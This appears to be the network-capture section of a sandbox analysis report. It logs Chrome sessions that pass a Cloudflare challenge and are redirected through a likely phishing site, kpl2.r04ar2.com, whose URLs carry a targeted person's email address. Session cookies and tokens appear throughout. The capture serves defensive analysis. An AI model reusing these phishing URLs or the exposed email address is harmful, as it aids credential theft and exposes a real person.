                                                          2024-08-27 22:11:01 UTC746INData Raw: 46 5a 62 58 35 78 5a 6e 6c 78 6b 32 70 32 71 71 4e 6f 66 32 4f 6b 68 49 4e 2b 71 59 2b 45 74 36 79 61 69 34 57 57 6e 6f 69 59 73 4c 61 52 74 61 47 2f 6c 71 47 41 68 48 36 44 7a 61 43 66 30 61 6d 46 6e 64 4c 4d 70 4a 69 31 7a 35 61 71 32 38 32 33 6e 37 6a 63 76 73 47 2b 6e 62 57 65 73 75 6a 57 71 36 57 32 34 4b 61 37 76 61 6e 51 38 65 7a 50 75 4e 4c 34 36 72 6e 77 78 73 7a 64 33 74 62 6b 31 4d 2f 52 41 64 44 68 79 75 4c 59 35 51 48 62 36 67 2f 4e 2f 64 50 72 42 51 4c 4f 47 75 55 61 36 4f 6e 64 39 75 6a 71 39 76 48 79 2f 42 55 56 42 51 45 48 2f 41 6a 66 48 51 49 4f 49 67 6f 79 39 50 34 43 4c 78 67 53 4d 50 6a 37 46 66 6a 32 44 78 77 63 46 52 59 4f 49 6b 67 5a 41 68 34 4b 48 51 51 66 49 52 6b 2f 54 46 49 6a 48 30 78 56 49 54 4e 49 57 79 73 51 57 42 6f 2b 55
                                                          Data Ascii: FZbX5xZnlxk2p2qqNof2OkhIN+qY+Et6yai4WWnoiYsLaRtaG/lqGAhH6DzaCf0amFndLMpJi1z5aq2823n7jcvsG+nbWesujWq6W24Ka7vanQ8ezPuNL46rnwxszd3tbk1M/RAdDhyuLY5QHb6g/N/dPrBQLOGuUa6Ond9ujq9vHy/BUVBQEH/AjfHQIOIgoy9P4CLxgSMPj7Ffj2DxwcFRYOIkgZAh4KHQQfIRk/TFIjH0xVITNIWysQWBo+U


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.449785104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:02 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:02 UTC379INHTTP/1.1 404 Not Found
                                                          Date: Tue, 27 Aug 2024 22:11:02 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 7
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: J1ZLfQTWm5Lqs5iuued80agSYRZWsObUFag=$roiI11/oz/7QOj4E
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6523c95443ac-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:11:02 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                          Data Ascii: invalid


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.449787188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:02 UTC1438OUTPOST /apsDh9aBaVhYjUySTyaOt7dEJs5t HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          Content-Length: 1213
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-platform: "Windows"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTXiou5djtlskjSmp
                                                          Accept: */*
                                                          Origin: https://kpl2.r04ar2.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://kpl2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6IisvOG9mR2JjOWNQd1QwWGhmUXQ3VlE9PSIsInZhbHVlIjoiRnUvcXBDOHFiZWxEdVlSdy85RnVoNzlxZnBPVkJ4dGQwNFpaeWhpcjFUZVZYb3U5NDhFSW0ydjRhcC9jdGdlTE5tRm0zTDd3K3JGZkxXR2JzM09NeEZjemdqcWJWcE1LdzlRTHM4OHU4Skd3TFV6SkRmbEhHcWF2dnp3OFhwSHUiLCJtYWMiOiIwOTkwNWU0YTVkYmVjMzYzYjdhNTI4YTVlZWQzZTc1MDlhMWUxODk2MjYzZTFjOGViMGZhMDEyZDNlODViNTJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InY3MUorOHI1SzFvNUdaVnBPakQxUGc9PSIsInZhbHVlIjoiNzd5bGhPYXdDN05MVkVmRmthUmd0aFBuZ1l1RXJ3d3haSS9aZkdpYVFvSTA5Tyt1bk5UREdlMXU5dlk4Nzlsczk4bHJkUjRDWlovWFhPZmlaR1o4NGlyQlRHMFlYZjFFak5JTStMQUZCZ1RrVjh0czJSektVQ1FrU1hXVjJ0WS8iLCJtYWMiOiI1MWRmNGE3ZDExYjlmMWNhNDg5NTQxZTYyMGJiM2ZhNDY4MGQwYTE4NGFlMWE3NzNkYmQ5MTA5ZDRmNGIwOWExIiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:02 UTC1213OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 54 58 69 6f 75 35 64 6a 74 6c 73 6b 6a 53 6d 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 49 38 6c 39 4e 66 59 58 56 38 6d 4b 46 38 79 67 36 48 44 53 41 56 70 53 47 47 4e 33 68 42 48 33 68 33 4e 58 68 4a 32 31 37 38 4d 65 66 79 4b 74 2d 77 62 4c 65 67 75 6e 63 75 75 43 56 70 6f 37 79 41 76 4f 31 71 6e 45 38 69 66 59 65 39 39 44 69 4d 37 46 77 73 75 50 72 36 48 54 5a 35 6e 61 31 4b 63 75 79 32 2d 69 6e 37 6f 45 71 34 63 6b 61 4d 76 51 65 47 68 42 6b 56 5f 50 73 2d 51 52 71 69 49 75 51 4f 54 65 37 66 79 69 65 6d 5a 45 6f 75 69
                                                          Data Ascii: ------WebKitFormBoundaryTXiou5djtlskjSmpContent-Disposition: form-data; name="cf-turnstile-response"0.I8l9NfYXV8mKF8yg6HDSAVpSGGN3hBH3h3NXhJ2178MefyKt-wbLeguncuuCVpo7yAvO1qnE8ifYe99DiM7FwsuPr6HTZ5na1Kcuy2-in7oEq4ckaMvQeGhBkV_Ps-QRqiIuQOTe7fyiemZEoui
                                                          2024-08-27 22:11:03 UTC995INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:03 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: no-cache, private
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O83QDiuf6vDsu1CmceL7wJrNNSrb68jZWW%2BsdrV9J9EPbFA3L2iCRWCWrOUe9hl4446T1w7FatfDnD2B5cYfPHDtJRD9Y9d5HI3lMvDW2WfUeBbGr8dP%2B6wU9inEAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6Ilg5dHZRdjE0RXpLUlBWc3Z4RmlLZGc9PSIsInZhbHVlIjoiUkNqelFSckNwampGVlJkTHZZa2M4alBPSDEzenJhNUFGZmxQQ3hsRFJDalJ6UmlSL1d0ZkJvdUdlVjJ6U2ltRnBKQ0RRcW9zdTVpSmVSeHlVSHJOMmhONkpRSHI4WXhJRkhMamhqSGtSWWZ5Z01tY205VStIQmN2MWFsSlROekoiLCJtYWMiOiJiYjFjMTMzZDY3MzIwYWJhNGQ2NzlhZDk1Zjg1ODdhNmRmZWQ2MjU0ZWYwYjAyM2NhYThjODk5MjNlZDA5MTI2IiwidGFnIjoiIn0%3D; expires=Wed, 28-Aug-2024 00:11:03 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                          2024-08-27 22:11:03 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 46 49 54 58 52 79 64 55 64 73 63 6d 68 61 61 45 70 32 63 58 68 59 62 45 5a 58 4e 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 6e 4a 61 52 32 49 30 53 6b 35 49 65 45 56 4c 57 57 35 61 53 57 46 56 4d 47 63 30 54 46 4a 31 4c 31 4a 7a 57 48 64 72 61 56 46 78 4f 46 49 72 62 31 42 51 4f 47 4e 36 52 79 74 51 53 30 6c 68 4d 6b 35 6b 4e 54 42 6b 61 6b 4a 4b 64 48 4a 31 62 55 49 32 55 6c 64 6f 4e 6e 46 68 61 6a 4a 71 51 6b 31 52 56 6b 74 53 57 57 78 68 61 54 4a 76 59 53 73 33 57 55 35 47 53 48 4e 69 64 33 64 70 54 6a 51 79 5a 45 59 34 57 57 68 57 56 58 6c 31 57 47 64 59 57 45 70 6f 4f 48 55 32 55 44 5a 35 54 32 35 44 52 31 70 6a 65 55 51
                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InFITXRydUdscmhaaEp2cXhYbEZXNUE9PSIsInZhbHVlIjoiNnJaR2I0Sk5IeEVLWW5aSWFVMGc0TFJ1L1JzWHdraVFxOFIrb1BQOGN6RytQS0lhMk5kNTBkakJKdHJ1bUI2UldoNnFhajJqQk1RVktSWWxhaTJvYSs3WU5GSHNid3dpTjQyZEY4WWhWVXl1WGdYWEpoOHU2UDZ5T25DR1pjeUQ
                                                          2024-08-27 22:11:03 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                          Data Ascii: 14{"status":"success"}
                                                          2024-08-27 22:11:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.449790188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:04 UTC1519OUTGET /KPL2/?em=natasha.hammond@lchs.com.au HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: iframe
                                                          Referer: https://kpl2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6Ilg5dHZRdjE0RXpLUlBWc3Z4RmlLZGc9PSIsInZhbHVlIjoiUkNqelFSckNwampGVlJkTHZZa2M4alBPSDEzenJhNUFGZmxQQ3hsRFJDalJ6UmlSL1d0ZkJvdUdlVjJ6U2ltRnBKQ0RRcW9zdTVpSmVSeHlVSHJOMmhONkpRSHI4WXhJRkhMamhqSGtSWWZ5Z01tY205VStIQmN2MWFsSlROekoiLCJtYWMiOiJiYjFjMTMzZDY3MzIwYWJhNGQ2NzlhZDk1Zjg1ODdhNmRmZWQ2MjU0ZWYwYjAyM2NhYThjODk5MjNlZDA5MTI2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InFITXRydUdscmhaaEp2cXhYbEZXNUE9PSIsInZhbHVlIjoiNnJaR2I0Sk5IeEVLWW5aSWFVMGc0TFJ1L1JzWHdraVFxOFIrb1BQOGN6RytQS0lhMk5kNTBkakJKdHJ1bUI2UldoNnFhajJqQk1RVktSWWxhaTJvYSs3WU5GSHNid3dpTjQyZEY4WWhWVXl1WGdYWEpoOHU2UDZ5T25DR1pjeUQiLCJtYWMiOiI0OWRmMTA1NmQ5ZTI4M2ZhZDgwOTZjMjdlZjU4ZDZjMWQxYTI5NDE4ZGE4ZDRiNTQxZmY5M2JkYWYwMzRiMTYyIiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:04 UTC1203INHTTP/1.1 302 Found
                                                          Date: Tue, 27 Aug 2024 22:11:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: no-cache, private
                                                          Location: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlW1vbjCVsYBufYaHb3MMIY1hD93bdaB%2Bsv18UO8oEr73MyjTSrX4h48%2BxSexfBjphFH7cyVNCvyy5c9VoeahVNyF0xg5yTKXCD2%2B6jOh%2FU6mJJLl84PGGtkBU6BZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6ImVBdVp1aGc1THQzSVd3TlMzMENXZkE9PSIsInZhbHVlIjoia0pRdkVGUlVUdVRSZi9RYjZic29scm1RNFlUUEg2V2FraXRYQ0ppSGhCT0pLSS81QXVIZlN4dENoMHk5dzJqSVdqTjRrSlE3U0Q2cWVTdGw1eUdTc3JXUnB5OTk3TWFMN0RMRTlHem9jR3NvU05FSXFrbHRZaURVUWhlaTJKLzAiLCJtYWMiOiIxZGFhMzc3ZGYxOGI3N2QxOTA5MzNlM2EyYzkzOGNkOWJiOGE2ZmZmNzg3N2U3ZjVhNDFjN2E0ODk1MWMwMjQzIiwidGFnIjoiIn0%3D; expires=Wed, 28-Aug-2024 00:11:04 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                          2024-08-27 22:11:04 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 59 72 4d 57 64 4b 54 31 70 75 55 6b 56 79 52 55 56 4e 4d 30 39 75 55 57 4a 70 65 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 57 70 61 53 46 52 6b 52 31 6c 71 4d 32 68 30 62 32 78 49 62 48 6c 6c 4e 58 52 76 52 6b 56 44 4d 6a 5a 53 61 44 52 6f 57 44 4d 77 64 30 74 53 52 6c 46 56 54 46 64 76 65 69 74 43 54 48 68 42 52 33 4e 33 4f 58 68 72 56 44 42 54 4e 6b 78 71 4d 45 35 4e 59 6d 35 69 57 6a 45 30 64 6e 4e 55 53 7a 6c 4a 54 6e 55 76 55 46 6c 4d 53 54 41 35 63 46 70 79 63 45 4a 34 65 55 30 33 64 57 46 73 55 54 56 4e 64 56 5a 54 62 47 5a 30 61 6a 6c 32 51 57 74 33 54 55 6c 4d 65 44 49 77 63 6b 70 55 4d 48 6b 34 61 32 4d 33 56 56 55
                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImYrMWdKT1puUkVyRUVNM09uUWJpelE9PSIsInZhbHVlIjoiSWpaSFRkR1lqM2h0b2xIbHllNXRvRkVDMjZSaDRoWDMwd0tSRlFVTFdveitCTHhBR3N3OXhrVDBTNkxqME5NYm5iWjE0dnNUSzlJTnUvUFlMSTA5cFpycEJ4eU03dWFsUTVNdVZTbGZ0ajl2QWt3TUlMeDIwckpUMHk4a2M3VVU
                                                          2024-08-27 22:11:04 UTC977INData Raw: 33 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 6b 70 6c 32 2e 72 30 34 61 72 32 2e 63 6f 6d 2f 44 53 4a 4b 42 52 52 53 48 56 51 4b 51 4e 41 59 50 48 55 4c 4e 49 41 52 4d 50 57 4e 52 51 37 32 61 70 67 67 38 65 6d 79 34 35 65 63 78 65 70 32 6f 78 31 63 32 7a 73 6f 64 75 35 67 3f 78 6c 74 71 67 6e 67 6d 67 67 74 62 73 75 73 79 66 66 67 6c 72 6f 65 75 61 64 61 63 75 66 68 73 7a 33 33 35 33 37 37 39 36 32 34 35 39 33 31
                                                          Data Ascii: 3ca<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz33537796245931
                                                          2024-08-27 22:11:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.449791188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:04 UTC1090OUTGET /apsDh9aBaVhYjUySTyaOt7dEJs5t HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6Ilg5dHZRdjE0RXpLUlBWc3Z4RmlLZGc9PSIsInZhbHVlIjoiUkNqelFSckNwampGVlJkTHZZa2M4alBPSDEzenJhNUFGZmxQQ3hsRFJDalJ6UmlSL1d0ZkJvdUdlVjJ6U2ltRnBKQ0RRcW9zdTVpSmVSeHlVSHJOMmhONkpRSHI4WXhJRkhMamhqSGtSWWZ5Z01tY205VStIQmN2MWFsSlROekoiLCJtYWMiOiJiYjFjMTMzZDY3MzIwYWJhNGQ2NzlhZDk1Zjg1ODdhNmRmZWQ2MjU0ZWYwYjAyM2NhYThjODk5MjNlZDA5MTI2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InFITXRydUdscmhaaEp2cXhYbEZXNUE9PSIsInZhbHVlIjoiNnJaR2I0Sk5IeEVLWW5aSWFVMGc0TFJ1L1JzWHdraVFxOFIrb1BQOGN6RytQS0lhMk5kNTBkakJKdHJ1bUI2UldoNnFhajJqQk1RVktSWWxhaTJvYSs3WU5GSHNid3dpTjQyZEY4WWhWVXl1WGdYWEpoOHU2UDZ5T25DR1pjeUQiLCJtYWMiOiI0OWRmMTA1NmQ5ZTI4M2ZhZDgwOTZjMjdlZjU4ZDZjMWQxYTI5NDE4ZGE4ZDRiNTQxZmY5M2JkYWYwMzRiMTYyIiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:05 UTC583INHTTP/1.1 404 Not Found
                                                          Date: Tue, 27 Aug 2024 22:11:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2B3Hwfm5URa0VIteODWMU8DrfSEvhq2TVdS8YuOi20LAechWtbpiyhuqmicuzV2Bgmk6g52Ft91M1q3K0Ga0TX76s19zPo9ucrgRAgL%2FcN5%2BeBG%2F84dvq1celzyB%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65323f758c3f-EWR
                                                          2024-08-27 22:11:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.44979335.190.80.14431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:05 UTC538OUTOPTIONS /report/v4?s=M%2B3Hwfm5URa0VIteODWMU8DrfSEvhq2TVdS8YuOi20LAechWtbpiyhuqmicuzV2Bgmk6g52Ft91M1q3K0Ga0TX76s19zPo9ucrgRAgL%2FcN5%2BeBG%2F84dvq1celzyB%2Bw%3D%3D HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Origin: https://kpl2.r04ar2.com
                                                          Access-Control-Request-Method: POST
                                                          Access-Control-Request-Headers: content-type
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:05 UTC336INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          access-control-max-age: 86400
                                                          access-control-allow-methods: POST, OPTIONS
                                                          access-control-allow-origin: *
                                                          access-control-allow-headers: content-length, content-type
                                                          date: Tue, 27 Aug 2024 22:11:05 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.449794188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:05 UTC1640OUTGET /DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: iframe
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Referer: https://kpl2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImVBdVp1aGc1THQzSVd3TlMzMENXZkE9PSIsInZhbHVlIjoia0pRdkVGUlVUdVRSZi9RYjZic29scm1RNFlUUEg2V2FraXRYQ0ppSGhCT0pLSS81QXVIZlN4dENoMHk5dzJqSVdqTjRrSlE3U0Q2cWVTdGw1eUdTc3JXUnB5OTk3TWFMN0RMRTlHem9jR3NvU05FSXFrbHRZaURVUWhlaTJKLzAiLCJtYWMiOiIxZGFhMzc3ZGYxOGI3N2QxOTA5MzNlM2EyYzkzOGNkOWJiOGE2ZmZmNzg3N2U3ZjVhNDFjN2E0ODk1MWMwMjQzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImYrMWdKT1puUkVyRUVNM09uUWJpelE9PSIsInZhbHVlIjoiSWpaSFRkR1lqM2h0b2xIbHllNXRvRkVDMjZSaDRoWDMwd0tSRlFVTFdveitCTHhBR3N3OXhrVDBTNkxqME5NYm5iWjE0dnNUSzlJTnUvUFlMSTA5cFpycEJ4eU03dWFsUTVNdVZTbGZ0ajl2QWt3TUlMeDIwckpUMHk4a2M3VVUiLCJtYWMiOiI4ODI2OTZiOTlhNzk3OTQyYzlhZmMyODY0ZWJkMzgyOTJlMTFmMTNmNDE2NDg2YTRiMmFjMWI2ZTA2YzExZDhiIiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:06 UTC1009INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: no-cache, private
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Wp%2B%2Fd4tu2v0gFEuHIz%2BCpF9CAmyNbdTxesrNvbKs8ojEOVa%2Fuuwd21UOntzXG1DvtjQrUllvpOg7s541qLdChHAfaC8rKjTazY0c%2BSBWtuc3AXGtXaIpm8OnkovLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; expires=Wed, 28-Aug-2024 00:11:06 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                          2024-08-27 22:11:06 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 46 6d 64 6d 64 6e 53 45 35 4f 4e 6a 5a 42 59 30 4a 79 59 6a 56 53 56 6c 4a 35 62 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 33 64 70 64 44 56 5a 5a 45 56 7a 4f 48 6c 6f 61 6c 59 35 64 57 46 71 5a 47 78 76 53 45 6b 72 4d 6e 68 52 4d 57 38 35 64 47 31 56 55 45 78 4b 59 6a 4a 5a 51 55 52 43 64 55 52 6c 52 31 46 52 61 30 59 72 64 6b 35 69 4d 56 4a 4e 53 6d 78 30 53 6a 64 43 61 58 46 78 57 44 4a 56 4d 6a 46 30 64 54 64 6e 65 57 67 79 53 46 42 43 53 6d 31 6e 57 6a 6c 69 55 58 55 31 53 47 35 33 55 57 70 31 57 48 64 48 51 33 59 72 4d 56 6c 55 53 6a 5a 49 64 30 74 47 57 6c 6c 56 61 32 4e 73 4d 54 59 30 4e 7a 42 68 4d 33 6c 48 54 31 6b
